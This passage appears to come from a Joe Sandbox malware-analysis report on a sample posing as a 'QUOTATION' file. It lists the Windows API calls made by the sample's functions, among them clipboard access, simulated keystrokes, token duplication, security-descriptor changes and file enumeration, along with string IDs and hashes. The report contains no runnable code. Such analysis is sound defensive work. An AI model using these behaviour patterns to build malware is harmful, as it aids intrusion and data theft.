                                                                              • Part of subcall function 00635745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0063949C,?,00008000), ref: 00635773
                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 006A76DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 1214770103-0
                                                                            • Opcode ID: 0c488166a7bd6e178565efb92d29efa36f3040bb617c811fb27e5c510748d857
                                                                            • Instruction ID: c72d6a8afb14509fce5df40810b5564345c9628b6eac6e578bc7d2a61cb1afca
                                                                            • Opcode Fuzzy Hash: 0c488166a7bd6e178565efb92d29efa36f3040bb617c811fb27e5c510748d857
                                                                            • Instruction Fuzzy Hash: 198171306087019FCB55EF28C891BA9B7E2AF89310F04455DF8865B3A2DB70ED45CF96
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0106BDE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                            • Instruction ID: 924dc0dfe913964c8077a7f26f8246a7b02f3bcbbda02f5dab158e723dca07cf
                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                            • Instruction Fuzzy Hash: 9BE0BF7494410EEFDB00EFA4D5496EE7BB4EF04301F1005A1FD05D7681DB309E648A62
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(?,?,00000000,006724E0), ref: 00636266
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 92960ebbe339090ce7949f72a9c3b4e500f503d86e1498f502f503a44a174eb6
                                                                            • Instruction ID: 239624322789354b91d472a73592db77bab6069e5a62cffa728651e45da9d48e
                                                                            • Opcode Fuzzy Hash: 92960ebbe339090ce7949f72a9c3b4e500f503d86e1498f502f503a44a174eb6
                                                                            • Instruction Fuzzy Hash: E2E0B675400B01DFC3314F1AE804452FBF6FFE13613218A2EE1E992664D3B059868F90
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0106BDE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: f0ebe686c693700f92318de75cab8b4a9d833fbebca09614ea80f9c5f45df4fe
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: 2CE0E67494410EDFDB00EFB4D5496EE7FB4EF04301F100161FD01D2281DA309D608A62
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006C961A
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006C965B
                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 006C969F
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006C96C9
                                                                            • SendMessageW.USER32 ref: 006C96F2
                                                                            • GetKeyState.USER32(00000011), ref: 006C978B
                                                                            • GetKeyState.USER32(00000009), ref: 006C9798
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006C97AE
                                                                            • GetKeyState.USER32(00000010), ref: 006C97B8
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006C97E9
                                                                            • SendMessageW.USER32 ref: 006C9810
                                                                            • SendMessageW.USER32(?,00001030,?,006C7E95), ref: 006C9918
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006C992E
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006C9941
                                                                            • SetCapture.USER32(?), ref: 006C994A
                                                                            • ClientToScreen.USER32(?,?), ref: 006C99AF
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006C99BC
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006C99D6
                                                                            • ReleaseCapture.USER32 ref: 006C99E1
                                                                            • GetCursorPos.USER32(?), ref: 006C9A19
                                                                            • ScreenToClient.USER32(?,?), ref: 006C9A26
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 006C9A80
                                                                            • SendMessageW.USER32 ref: 006C9AAE
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 006C9AEB
                                                                            • SendMessageW.USER32 ref: 006C9B1A
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006C9B3B
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 006C9B4A
                                                                            • GetCursorPos.USER32(?), ref: 006C9B68
                                                                            • ScreenToClient.USER32(?,?), ref: 006C9B75
                                                                            • GetParent.USER32(?), ref: 006C9B93
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 006C9BFA
                                                                            • SendMessageW.USER32 ref: 006C9C2B
                                                                            • ClientToScreen.USER32(?,?), ref: 006C9C84
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006C9CB4
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 006C9CDE
                                                                            • SendMessageW.USER32 ref: 006C9D01
                                                                            • ClientToScreen.USER32(?,?), ref: 006C9D4E
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006C9D82
                                                                              • Part of subcall function 00649944: GetWindowLongW.USER32(?,000000EB), ref: 00649952
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C9E05
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                            • String ID: @GUI_DRAGID$F$p#p
                                                                            • API String ID: 3429851547-3138188465
                                                                            • Opcode ID: 00507060acd773b68595fbb276c5b0e9e623cd824b2143942385edaaebdfe950
                                                                            • Instruction ID: d6b99af577179a3026abdbe5bb1fda63f46583b455db65072f8ee89aad343d0f
                                                                            • Opcode Fuzzy Hash: 00507060acd773b68595fbb276c5b0e9e623cd824b2143942385edaaebdfe950
                                                                            • Instruction Fuzzy Hash: A9426834204241AFEB24CF25C848FBABBE6EF49320F14461DF699972A1D731E961CB65
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006C48F3
                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 006C4908
                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 006C4927
                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 006C494B
                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 006C495C
                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 006C497B
                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006C49AE
                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006C49D4
                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 006C4A0F
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 006C4A56
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 006C4A7E
                                                                            • IsMenu.USER32(?), ref: 006C4A97
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006C4AF2
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006C4B20
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C4B94
                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 006C4BE3
                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 006C4C82
                                                                            • wsprintfW.USER32 ref: 006C4CAE
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006C4CC9
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 006C4CF1
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006C4D13
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006C4D33
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 006C4D5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 4054740463-328681919
                                                                            • Opcode ID: 082ecdfc09b37a282892a590bae34039e786943d20baefd77c2cedc3339660f9
                                                                            • Instruction ID: ce6c999fb0f506f0ae865948301dbc6c32a39a9dafa0b45a0c9c6dd719689342
                                                                            • Opcode Fuzzy Hash: 082ecdfc09b37a282892a590bae34039e786943d20baefd77c2cedc3339660f9
                                                                            • Instruction Fuzzy Hash: 5012DE71600214ABEB249F29CC59FFE7BBAEF85320F10412DF51AEA2E1DB749941CB50
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0064F998
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068F474
                                                                            • IsIconic.USER32(00000000), ref: 0068F47D
                                                                            • ShowWindow.USER32(00000000,00000009), ref: 0068F48A
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0068F494
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068F4AA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0068F4B1
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068F4BD
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068F4CE
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068F4D6
                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0068F4DE
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0068F4E1
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F4F6
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F501
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F50B
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F510
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F519
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F51E
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068F528
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0068F52D
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0068F530
                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0068F557
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: 26c00bf88f65f903a6eb1f9b9ba7f931a4e0c47b45f1ebe5b7536409eb9b54d7
                                                                            • Instruction ID: 8b66b126e64079651b1dcd9a356553a1b814716678315c5a46ba1c8e7ae4b553
                                                                            • Opcode Fuzzy Hash: 26c00bf88f65f903a6eb1f9b9ba7f931a4e0c47b45f1ebe5b7536409eb9b54d7
                                                                            • Instruction Fuzzy Hash: 99318671A40218BFEB206BB55C4AFBF7E6EEB44B60F101026F605E61D1C7B05D11ABA1
                                                                            APIs
                                                                              • Part of subcall function 006916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0069170D
                                                                              • Part of subcall function 006916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0069173A
                                                                              • Part of subcall function 006916C3: GetLastError.KERNEL32 ref: 0069174A
                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00691286
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006912A8
                                                                            • CloseHandle.KERNEL32(?), ref: 006912B9
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006912D1
                                                                            • GetProcessWindowStation.USER32 ref: 006912EA
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 006912F4
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00691310
                                                                              • Part of subcall function 006910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006911FC), ref: 006910D4
                                                                              • Part of subcall function 006910BF: CloseHandle.KERNEL32(?,?,006911FC), ref: 006910E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                            • String ID: $default$winsta0$Zo
                                                                            • API String ID: 22674027-784821077
                                                                            • Opcode ID: aefbb18b2c94a29ce0abf702245c44809839e6064e55a603eabe6a634db202d8
                                                                            • Instruction ID: 67d2b40bded6f2fdea77959f674719716c83961313ccb0e0482560cc162d75d2
                                                                            • Opcode Fuzzy Hash: aefbb18b2c94a29ce0abf702245c44809839e6064e55a603eabe6a634db202d8
                                                                            • Instruction Fuzzy Hash: 56819F7190020AAFEF119FA4DC49FEE7BFEEF09B14F244119F915AA6A0C7318945CB64
                                                                            APIs
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00691114
                                                                              • Part of subcall function 006910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691120
                                                                              • Part of subcall function 006910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 0069112F
                                                                              • Part of subcall function 006910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691136
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0069114D
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00690BCC
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00690C00
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690C17
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00690C51
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00690C6D
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690C84
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00690C8C
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00690C93
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00690CB4
                                                                            • CopySid.ADVAPI32(00000000), ref: 00690CBB
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00690CEA
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00690D0C
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00690D1E
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690D45
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D4C
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690D55
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D5C
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690D65
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D6C
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00690D78
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690D7F
                                                                              • Part of subcall function 00691193: GetProcessHeap.KERNEL32(00000008,00690BB1,?,00000000,?,00690BB1,?), ref: 006911A1
                                                                              • Part of subcall function 00691193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00690BB1,?), ref: 006911A8
                                                                              • Part of subcall function 00691193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00690BB1,?), ref: 006911B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 4175595110-0
                                                                            • Opcode ID: 8734297409bf20b21cd87233d632060ca43719918f36dfea5e68738ae4cb2fd6
                                                                            • Instruction ID: 792acddbdd1a53eb288791d8bd570fc9570ecd1d8557b33e29050b84e6dd6447
                                                                            • Opcode Fuzzy Hash: 8734297409bf20b21cd87233d632060ca43719918f36dfea5e68738ae4cb2fd6
                                                                            • Instruction Fuzzy Hash: 70714A72A0020AEFEF10DFA5DC44FEEBBBEBF08314F144515E919A6691D771A905CB60
                                                                            APIs
                                                                            • OpenClipboard.USER32(006CCC08), ref: 006AEB29
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 006AEB37
                                                                            • GetClipboardData.USER32(0000000D), ref: 006AEB43
                                                                            • CloseClipboard.USER32 ref: 006AEB4F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006AEB87
                                                                            • CloseClipboard.USER32 ref: 006AEB91
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006AEBBC
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 006AEBC9
                                                                            • GetClipboardData.USER32(00000001), ref: 006AEBD1
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006AEBE2
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006AEC22
                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 006AEC38
                                                                            • GetClipboardData.USER32(0000000F), ref: 006AEC44
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006AEC55
                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 006AEC77
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006AEC94
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006AECD2
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006AECF3
                                                                            • CountClipboardFormats.USER32 ref: 006AED14
                                                                            • CloseClipboard.USER32 ref: 006AED59
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                            • String ID:
                                                                            • API String ID: 420908878-0
                                                                            • Opcode ID: 72c43d978252b1190be8660c81491d76a84df78745ed0b14901c7ebe020dfa56
                                                                            • Instruction ID: f2523c48b63f77485bef0c8f15d46cac33fb976c4c33f9ccd11396adfdd15f4d
                                                                            • Opcode Fuzzy Hash: 72c43d978252b1190be8660c81491d76a84df78745ed0b14901c7ebe020dfa56
                                                                            • Instruction Fuzzy Hash: FB61AD34204201AFD300EF24D989F7AB7A6EF85724F14951DF45A972A2DB72DD06CFA2
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006A69BE
                                                                            • FindClose.KERNEL32(00000000), ref: 006A6A12
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006A6A4E
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006A6A75
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006A6AB2
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006A6ADF
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                            • API String ID: 3232708057-3289030164
                                                                            • Opcode ID: 9a4c0a2fd4dbb168da8e1d1629af14d1af48275d82783bb7858d2820b2455242
                                                                            • Instruction ID: 8823fb1a760c9164859259d8e6b3cfcfcf6c87d3cd938c9a7019691847a57416
                                                                            • Opcode Fuzzy Hash: 9a4c0a2fd4dbb168da8e1d1629af14d1af48275d82783bb7858d2820b2455242
                                                                            • Instruction Fuzzy Hash: 8CD174B2508300AFC754EBA4C885EABB7EDEF89704F04491DF585D7291EB74DA04CBA2
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,769A8FB0,?,00000000), ref: 006A9663
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006A96A1
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 006A96BB
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006A96D3
                                                                            • FindClose.KERNEL32(00000000), ref: 006A96DE
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006A96FA
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A974A
                                                                            • SetCurrentDirectoryW.KERNEL32(006F6B7C), ref: 006A9768
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006A9772
                                                                            • FindClose.KERNEL32(00000000), ref: 006A977F
                                                                            • FindClose.KERNEL32(00000000), ref: 006A978F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: f2e436552b89c8e7ff428ec3ad7a4aabb92e1777b2df654561ae35e69034ae31
                                                                            • Instruction ID: 79206b1618fb39e1e1fdaa2878d38b340883de2a538f43778e866d3463983663
                                                                            • Opcode Fuzzy Hash: f2e436552b89c8e7ff428ec3ad7a4aabb92e1777b2df654561ae35e69034ae31
                                                                            • Instruction Fuzzy Hash: A431A2325402196EDB14EFB4EC59EEE77AEDF4A321F204155F919E2190DB34DE448E34
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,769A8FB0,?,00000000), ref: 006A97BE
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006A9819
                                                                            • FindClose.KERNEL32(00000000), ref: 006A9824
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006A9840
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A9890
                                                                            • SetCurrentDirectoryW.KERNEL32(006F6B7C), ref: 006A98AE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006A98B8
                                                                            • FindClose.KERNEL32(00000000), ref: 006A98C5
                                                                            • FindClose.KERNEL32(00000000), ref: 006A98D5
                                                                              • Part of subcall function 0069DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0069DB00
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: 025a5e82d247093eb4659b4bfc4f661e4e303da90f472d09d47e5f5ae5cfa06f
                                                                            • Instruction ID: 417ce41f789676fe01c04ba9426309303046d96417fc66176afe1f261bbf8be7
                                                                            • Opcode Fuzzy Hash: 025a5e82d247093eb4659b4bfc4f661e4e303da90f472d09d47e5f5ae5cfa06f
                                                                            • Instruction Fuzzy Hash: C03190315006196EDB10EFA4EC48EEE77BE9F47320F2445A9E918A2291DB38DE458F74
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BBF3E
